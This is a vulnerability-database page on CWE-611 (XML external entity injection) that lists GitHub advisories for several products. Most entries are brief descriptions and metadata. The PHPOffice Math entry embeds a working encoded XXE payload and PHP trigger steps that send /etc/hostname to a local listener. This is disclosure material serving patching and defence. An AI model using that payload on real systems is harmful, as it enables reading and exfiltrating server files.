CWE-611
AllowedImproper Restriction of XML External Entity Reference
Abstraction: Base · Status: Draft
The product processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output.
1694 vulnerabilities reference this CWE, most recent first.
GHSA-3X6C-XFWC-QP7M
Vulnerability from github – Published: 2024-03-29 18:30 – Updated: 2025-03-27 18:30An XML external entity (XXE) vulnerability was found in Stilog Visual Planning 8. It allows an authenticated attacker to access local server files and exfiltrate data to an external server.
{
"affected": [],
"aliases": [
"CVE-2023-49234"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-03-29T17:15:11Z",
"severity": "MODERATE"
},
"details": "An XML external entity (XXE) vulnerability was found in Stilog Visual Planning 8. It allows an authenticated attacker to access local server files and exfiltrate data to an external server.",
"id": "GHSA-3x6c-xfwc-qp7m",
"modified": "2025-03-27T18:30:38Z",
"published": "2024-03-29T18:30:42Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49234"
},
{
"type": "WEB",
"url": "https://www.schutzwerk.com/advisories/SCHUTZWERK-SA-2023-006.txt"
},
{
"type": "WEB",
"url": "https://www.schutzwerk.com/blog/schutzwerk-sa-2023-006"
},
{
"type": "WEB",
"url": "https://www.visual-planning.com/en/support-portal/updates"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2024/Apr/3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-3XG5-6C3J-VP8X
Vulnerability from github – Published: 2021-08-30 16:23 – Updated: 2024-10-16 21:28XML External Entities (XXE) in Quokka v0.4.0 allows remote attackers to execute arbitrary code via the component 'quokka/utils/atom.py'.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "quokka"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.4.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2020-18703"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": true,
"github_reviewed_at": "2021-08-26T17:42:07Z",
"nvd_published_at": "2021-08-16T18:15:00Z",
"severity": "CRITICAL"
},
"details": "XML External Entities (XXE) in Quokka v0.4.0 allows remote attackers to execute arbitrary code via the component \u0027quokka/utils/atom.py\u0027.",
"id": "GHSA-3xg5-6c3j-vp8x",
"modified": "2024-10-16T21:28:22Z",
"published": "2021-08-30T16:23:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-18703"
},
{
"type": "WEB",
"url": "https://github.com/rochacbruno/quokka/issues/676"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/quokka/PYSEC-2021-144.yaml"
},
{
"type": "PACKAGE",
"url": "https://github.com/quokkaproject/quokka"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Improper Restriction of XML External Entity Reference in Quokka"
}
GHSA-427G-2R83-3CCM
Vulnerability from github – Published: 2019-11-12 22:59 – Updated: 2024-02-12 11:49An XML entity injection vulnerability exists in Magento 2.2 prior to 2.2.10, Magento 2.3 prior to 2.3.3 or 2.3.2-p1. An authenticated admin user can craft document type definition for an XML representing XML layout. The crafted document type definition and XML layout allow processing of external entities which can lead to information disclosure.
As per the Magento Release 2.3.3, if you have already implemented the pre-release version of this patch (2.3.2-p1), it is highly recommended to promptly upgrade to 2.3.2-p2.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "magento/community-edition"
},
"ranges": [
{
"events": [
{
"introduced": "2.2"
},
{
"fixed": "2.2.10"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "magento/community-edition"
},
"ranges": [
{
"events": [
{
"introduced": "2.3"
},
{
"fixed": "2.3.2-p2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2019-8126"
],
"database_specific": {
"cwe_ids": [
"CWE-611",
"CWE-776"
],
"github_reviewed": true,
"github_reviewed_at": "2019-11-12T22:13:59Z",
"nvd_published_at": "2019-11-05T23:15:00Z",
"severity": "MODERATE"
},
"details": "An XML entity injection vulnerability exists in Magento 2.2 prior to 2.2.10, Magento 2.3 prior to 2.3.3 or 2.3.2-p1. An authenticated admin user can craft document type definition for an XML representing XML layout. The crafted document type definition and XML layout allow processing of external entities which can lead to information disclosure.\n\nAs per [the Magento Release 2.3.3](https://web.archive.org/web/20201126132230/https://devdocs.magento.com/guides/v2.3/release-notes/release-notes-2-3-3-commerce.html#new-security-only-patch-available), if you have already implemented the pre-release version of this patch (2.3.2-p1), it is highly recommended to promptly upgrade to 2.3.2-p2.",
"id": "GHSA-427g-2r83-3ccm",
"modified": "2024-02-12T11:49:40Z",
"published": "2019-11-12T22:59:24Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8126"
},
{
"type": "WEB",
"url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8126.yaml"
},
{
"type": "WEB",
"url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Information disclosure through processing of external XML entities"
}
GHSA-427Q-VV76-73CH
Vulnerability from github – Published: 2022-05-13 01:32 – Updated: 2022-05-13 01:32IBM DataPower Gateway 7.1.0.0 - 7.1.0.23, 7.2.0.0 - 7.2.0.21, 7.5.0.0 - 7.5.0.16, 7.5.1.0 - 7.5.1.15, 7.5.2.0 - 7.5.2.15, and 7.6.0.0 - 7.6.0.8 as well as IBM DataPower Gateway CD 7.7.0.0 - 7.7.1.2 are vulnerable to a XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 144950.
{
"affected": [],
"aliases": [
"CVE-2018-1669"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-09-25T15:29:00Z",
"severity": "HIGH"
},
"details": "IBM DataPower Gateway 7.1.0.0 - 7.1.0.23, 7.2.0.0 - 7.2.0.21, 7.5.0.0 - 7.5.0.16, 7.5.1.0 - 7.5.1.15, 7.5.2.0 - 7.5.2.15, and 7.6.0.0 - 7.6.0.8 as well as IBM DataPower Gateway CD 7.7.0.0 - 7.7.1.2 are vulnerable to a XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 144950.",
"id": "GHSA-427q-vv76-73ch",
"modified": "2022-05-13T01:32:58Z",
"published": "2022-05-13T01:32:58Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1669"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/144950"
},
{
"type": "WEB",
"url": "https://www.ibm.com/support/docview.wss?uid=ibm10730489"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-42GH-7XP2-Q72C
Vulnerability from github – Published: 2022-05-14 01:39 – Updated: 2022-05-14 01:39The SaveUserSettings service in Content Manager in SDL Web 8.5.0 has an XXE Vulnerability that allows reading sensitive files from the system.
{
"affected": [],
"aliases": [
"CVE-2018-19371"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-01-02T18:29:00Z",
"severity": "MODERATE"
},
"details": "The SaveUserSettings service in Content Manager in SDL Web 8.5.0 has an XXE Vulnerability that allows reading sensitive files from the system.",
"id": "GHSA-42gh-7xp2-q72c",
"modified": "2022-05-14T01:39:10Z",
"published": "2022-05-14T01:39:10Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-19371"
},
{
"type": "WEB",
"url": "https://www.exploit-db.com/exploits/46000"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/150826/SDL-Web-Content-Manager-8.5.0-XML-Injection.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-42HM-PQ2F-3R7M
Vulnerability from github – Published: 2025-05-29 17:27 – Updated: 2025-05-30 21:42Product: Math
Version: 0.2.0
CWE-ID: CWE-611: Improper Restriction of XML External Entity Reference
CVSS vector v.4.0: 8.7 (AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N)
CVSS vector v.3.1: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
Description: An attacker can create a special XML file, during which it processed, external entities are loaded, and it’s possible to read local server files.
Impact: Local server files reading
Vulnerable component: The loadXML function with the unsafe LIBXML_DTDLOAD flag, the MathML class
Exploitation conditions: The vulnerability applies only to reading a file in the MathML format.
Mitigation: If there is no option to refuse using the LIBXML_DTDLOAD flag, it’s recommended to filter external entities through the implementation of the custom external entity loader function.
Researcher: Aleksandr Zhurnakov (Positive Technologies)
Research
Zero-day vulnerability was discovered in the Math library in the detailed process of the XXE vulnerability research in PHP.
Loading XML data, using the standard libxml extension and the LIBXML_DTDLOAD flag without additional filtration, leads to XXE.
Below are steps to reproduce the vulnerability.
-
Preparation:
-
The payload was tested on the PHP versions >= 8.1.
- The composer manager is used to install the latest version of the Math library.
- PHP has to be configurated with Zlib support.
- The necessary requirements for the Math library must be installed.
-
The
netcatutility is used for demonstration exfiltration. -
Make
mathdirectory and then moving into it.
mkdir math && cd math
- Install the latest actual version of the library (Figure 1).
composer require phpoffice/math
````
_Figure 1. Installing the library_
<img width="630" alt="fig2" src="https://github.com/user-attachments/assets/bb0c6781-4f5a-411c-970d-9402e652ad87" />
4. Create `poc.xml` file (Listing 1):
_Listing 1. Creating `poc.xml`_
xml
<foo></foo>
``
5. Createmath.php` file (Listing 2):
Listing 2. Creating math.php
<?php
require_once "./vendor/autoload.php";
$reader = new \PhpOffice\Math\Reader\MathML();
$reader->read(
file_get_contents('poc.xml')
);
- The payload (see the step 4) is set to exfiltrate the
/etc/hostnamefile throughhttp://127.0.0.1:9999/, so the listening socket is launched at the9999port (Figure 2)
Figure 2. Launching the listening socket
- Execute php-script via console:
php math.php
6 characters from the /etc/hostname file will be exfiltrated to the 9999 port in base64 format (Figure 3).
Figure 3. Characters exfiltration
Decode the received data from base64 removing the last M character (the payload feature) (Figure 4).
Figure 4. Data decoding
- By changing the payload, the remaining file can be received.
Credits
Aleksandr Zhurnakov (Positive Technologies)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.2.0"
},
"package": {
"ecosystem": "Packagist",
"name": "phpoffice/math"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.3.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-48882"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": true,
"github_reviewed_at": "2025-05-29T17:27:39Z",
"nvd_published_at": "2025-05-30T20:15:43Z",
"severity": "HIGH"
},
"details": "**Product:** Math\n**Version:** 0.2.0\n**CWE-ID:** CWE-611: Improper Restriction of XML External Entity Reference\n**CVSS vector v.4.0:** 8.7 (AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N)\n**CVSS vector v.3.1:** 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n**Description:** An attacker can create a special XML file, during which it processed, external entities are loaded, and it\u2019s possible to read local server files. \n**Impact:** Local server files reading\n**Vulnerable component:** The [`loadXML`](https://github.com/PHPOffice/Math/blob/c3ecbf35601e2a322bf2ddba48589d79ac827b92/src/Math/Reader/MathML.php#L38C9-L38C55) function with the unsafe [`LIBXML_DTDLOAD`](https://www.php.net/manual/en/libxml.constants.php#constant.libxml-dtdload) flag, the [`MathML`](https://github.com/PHPOffice/Math/blob/master/src/Math/Reader/MathML.php) class\n**Exploitation conditions:** The vulnerability applies only to reading a file in the `MathML` format.\n**Mitigation:** If there is no option to refuse using the [`LIBXML_DTDLOAD`](https://www.php.net/manual/en/libxml.constants.php#constant.libxml-dtdload) flag, it\u2019s recommended to filter external entities through the implementation of the [`custom external entity loader function`](https://www.php.net/manual/en/function.libxml-set-external-entity-loader.php).\n**Researcher: Aleksandr Zhurnakov (Positive Technologies)**\n\n## Research\nZero-day vulnerability was discovered in the [Math](https://github.com/PHPOffice/Math) library in the detailed process of the XXE vulnerability research in PHP.\nLoading XML data, using the standard [`libxml`](https://www.php.net/manual/en/book.libxml.php) extension and the [`LIBXML_DTDLOAD`](https://www.php.net/manual/en/libxml.constants.php#constant.libxml-dtdload) flag without additional filtration, leads to XXE.\n\nBelow are steps to reproduce the vulnerability.\n\n1. Preparation:\n\n- The payload was tested on the PHP versions \u003e= 8.1.\n- The [composer](https://getcomposer.org/) manager is used to install the latest version of the Math library.\n- PHP has to be configurated with [Zlib](https://www.php.net/manual/ru/book.zlib.php) support.\n- The necessary [requirements](https://github.com/PHPOffice/Math?tab=readme-ov-file#requirements) for the Math library must be installed.\n- The `netcat` utility is used for demonstration exfiltration.\n\n2. Make `math` directory and then moving into it.\n````\nmkdir math \u0026\u0026 cd math\n````\n\n3. Install the latest actual version of the library (Figure 1). \n```\ncomposer require phpoffice/math\n````\n_Figure 1. Installing the library_\n\u003cimg width=\"630\" alt=\"fig2\" src=\"https://github.com/user-attachments/assets/bb0c6781-4f5a-411c-970d-9402e652ad87\" /\u003e\n\n4. Create `poc.xml` file (Listing 1): \n\n_Listing 1. Creating `poc.xml`_\n```\nxml \n\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e \u003c!DOCTYPE x SYSTEM \n\"php://filter/convert.base64-\ndecode/zlib.inflate/resource=data:,7Ztdb9owFIbv%2bRVZJ9armNjOZ2k7QUaL%2bRYO2nqFUn\nBFNQaMptP272cnNFuTsBbSskg1iATZzvGxn/ccX3A4fdfoecS7UsrK1A98hV5Rr9FVjlaz1UmlcnM7D9i\n6MlkufrB1AK79O2bqKltMllMWt96KL6ADwci7sJ4Yu0vr9/tlwKbqan27CPzrOXvevFGrbRvOGIseaCa7\nTAxok1x44xahXzQEcdKPKZPevap3RZw920I0VscWGLlU1efPsy0c5cbV1AoI7ZuOMCZW12nkcP9Q2%2bQ\nObBNmL6ajg8s6xJqmJTrq5NIArX6zVk8Zcwwt4fPuLvHnbeBSvpdIQ6g93MvUv3CHqKNrmtEW4EYmCr5g\nDT5QzyNWE4x6xO1/aqQmgMhGYgaVDFUnScKltbFnaJoKHRuHK0L1pIkuaYselMe9cPUqRmm5C51u00kkh\ny1S3aBougkl7e4d6RGaTYeSehdCjAG/O/p%2bYfKyQsoLmgdlmsFYQFDjh6GWJyGE0ZfMX08EZtwNTdAY\nud7nLcksnwppA2UnqpCzgyDo1QadAU3vLOQZ82EHMxAi0KVcq7rzas5xD6AQoeqkYkgk02abukkJ/z%2b\nNvkj%2bjUy16Ba5d/S8anhBLwt44EgGkoFkIBlIBpKBZCAZSAaSgWQgGUgGkoFkIBlIBpKBZCAZSAaSgW\nQgGUgGxWOwW2nF7kt%2by7/Kb3ag2GUTUgBvXAAxiKxt4Is3sB4WniVrOvhwzB0CXerg5GN9esGRQv7Rg\nQdMmMO9sIwtc/sIJUOCsY4ee7f7FIWu2Si4euKan8wg58nFsEIXxYGntgZqMog3Z2FrgPhgyzIOlsmijo\nwqwb0jyMqMoGEbarqdOpP/iqFISMkSVFG1Z5p8f3OK%2bxAZ7gClpgUPg70rq0T2RIkcup/0newQ7NbcU\nXv/DPl4LL/N7hdfn2dp07pmd8v79YSdVVgwqcyWd8HC/8aOzkunf6r%2b2c8bpSxK/6uPmlf%2br/nSny\nrHcduH99iqKiz7HwLxTLMgEM0QWUDjb3ji8NdHPslZmV%2bqR%2bfH56Xyxni1VGbV0m8=\" \n[]\u003e\u003cfoo\u003e\u003c/foo\u003e\n```\n5. Create `math.php` file (Listing 2): \n\n*Listing 2. Creating `math.php`*\n````\n\u003c?php\n require_once \"./vendor/autoload.php\";\n\n $reader = new \\PhpOffice\\Math\\Reader\\MathML();\n $reader-\u003eread(\n file_get_contents(\u0027poc.xml\u0027)\n );\n````\n6. The payload (see the step 4) is set to exfiltrate the `/etc/hostname` file through `http://127.0.0.1:9999/`, so the listening socket is launched at the `9999` port (Figure 2)\n\n_Figure 2. Launching the listening socket_\n\u003cimg width=\"550\" alt=\"fig2\" src=\"https://github.com/user-attachments/assets/6da5b966-70be-4e3e-9bde-c6baf4dfef34\" /\u003e\n\n7. Execute php-script via console: \n````\nphp math.php \n````\n\n6 characters from the `/etc/hostname` file will be exfiltrated to the `9999` port in base64 format (Figure 3). \n\n_Figure 3. Characters exfiltration_\n\u003cimg width=\"520\" alt=\"fig3\" src=\"https://github.com/user-attachments/assets/f0eae873-d156-442f-ab08-12dd94a8dbe9\" /\u003e\n\nDecode the received data from base64 removing the last `M` character (the payload feature) (Figure 4).\n\n*Figure 4. Data decoding*\n\u003cimg width=\"595\" alt=\"fig4\" src=\"https://github.com/user-attachments/assets/7a091a07-7856-41a0-b1bd-3d8009303ced\" /\u003e\n\n8. By changing the payload, the remaining file can be received. \n\n## Credits\nAleksandr Zhurnakov (Positive Technologies)",
"id": "GHSA-42hm-pq2f-3r7m",
"modified": "2025-05-30T21:42:11Z",
"published": "2025-05-29T17:27:39Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/PHPOffice/Math/security/advisories/GHSA-42hm-pq2f-3r7m"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48882"
},
{
"type": "WEB",
"url": "https://github.com/PHPOffice/Math/commit/fc31c8f57a7a81f962cbf389fd89f4d9d06fc99a"
},
{
"type": "PACKAGE",
"url": "https://github.com/PHPOffice/Math"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "PHPOffice Math allows XXE when processing an XML file in the MathML format "
}
GHSA-42WX-65G4-5CXV
Vulnerability from github – Published: 2022-05-14 03:16 – Updated: 2023-09-12 19:08Apache NiFi External XML Entity issue in SplitXML processor. Malicious XML content could cause information disclosure or remote code execution. The fix to disable external general entity parsing and disallow doctype declarations was applied on the Apache NiFi 1.6.0 release. Users running a prior 1.x release should upgrade to the appropriate release.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.5.0"
},
"package": {
"ecosystem": "Maven",
"name": "org.apache.nifi:nifi-standard-processors"
},
"ranges": [
{
"events": [
{
"introduced": "0.1.0"
},
{
"fixed": "1.6.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2018-1309"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": true,
"github_reviewed_at": "2022-06-29T19:23:50Z",
"nvd_published_at": "2018-05-23T14:29:00Z",
"severity": "CRITICAL"
},
"details": "Apache NiFi External XML Entity issue in SplitXML processor. Malicious XML content could cause information disclosure or remote code execution. The fix to disable external general entity parsing and disallow doctype declarations was applied on the Apache NiFi 1.6.0 release. Users running a prior 1.x release should upgrade to the appropriate release.",
"id": "GHSA-42wx-65g4-5cxv",
"modified": "2023-09-12T19:08:14Z",
"published": "2022-05-14T03:16:17Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1309"
},
{
"type": "WEB",
"url": "https://github.com/apache/nifi/commit/28067a29fd13cdf8e21b440fc65c6dd67872522f"
},
{
"type": "PACKAGE",
"url": "https://github.com/apache/nifi"
},
{
"type": "WEB",
"url": "https://issues.apache.org/jira/browse/NIFI-4869"
},
{
"type": "WEB",
"url": "https://nifi.apache.org/security.html#CVE-2018-1309"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Improper Restriction of XML External Entity Reference in Apache NiFi"
}
GHSA-43M3-2GF4-GX9R
Vulnerability from github – Published: 2022-05-13 01:33 – Updated: 2022-05-13 01:33IBM Marketing Platform 9.1.0, 9.1.2, and 10.1 is vulnerable to a XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 139029.
{
"affected": [],
"aliases": [
"CVE-2018-1424"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-12-07T16:29:00Z",
"severity": "HIGH"
},
"details": "IBM Marketing Platform 9.1.0, 9.1.2, and 10.1 is vulnerable to a XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 139029.",
"id": "GHSA-43m3-2gf4-gx9r",
"modified": "2022-05-13T01:33:18Z",
"published": "2022-05-13T01:33:18Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1424"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/139029"
},
{
"type": "WEB",
"url": "http://www.ibm.com/support/docview.wss?uid=ibm10744217"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/106201"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-43PW-JFFV-MCR7
Vulnerability from github – Published: 2022-01-22 00:00 – Updated: 2022-01-28 00:03IBM Cognos Controller 10.4.0, 10.4.1, and 10.4.2 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 190838.
{
"affected": [],
"aliases": [
"CVE-2020-4875"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-01-21T18:15:00Z",
"severity": "HIGH"
},
"details": "IBM Cognos Controller 10.4.0, 10.4.1, and 10.4.2 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 190838.",
"id": "GHSA-43pw-jffv-mcr7",
"modified": "2022-01-28T00:03:27Z",
"published": "2022-01-22T00:00:40Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-4875"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/190838"
},
{
"type": "WEB",
"url": "https://www.ibm.com/support/pages/node/6509856"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-43X2-2PCR-G799
Vulnerability from github – Published: 2022-05-14 01:58 – Updated: 2022-05-14 01:58A remote code execution vulnerability exists when the Microsoft XML Core Services MSXML parser processes user input, aka "MS XML Remote Code Execution Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.
{
"affected": [],
"aliases": [
"CVE-2018-8420"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-09-13T00:29:00Z",
"severity": "HIGH"
},
"details": "A remote code execution vulnerability exists when the Microsoft XML Core Services MSXML parser processes user input, aka \"MS XML Remote Code Execution Vulnerability.\" This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.",
"id": "GHSA-43x2-2pcr-g799",
"modified": "2022-05-14T01:58:19Z",
"published": "2022-05-14T01:58:19Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-8420"
},
{
"type": "WEB",
"url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8420"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/105259"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id/1041627"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation
Many XML parsers and validators can be configured to disable external entity expansion.
CAPEC-221: Data Serialization External Entities Blowup
This attack takes advantage of the entity replacement property of certain data serialization languages (e.g., XML, YAML, etc.) where the value of the replacement is a URI. A well-crafted file could have the entity refer to a URI that consumes a large amount of resources to create a denial of service condition. This can cause the system to either freeze, crash, or execute arbitrary code depending on the URI.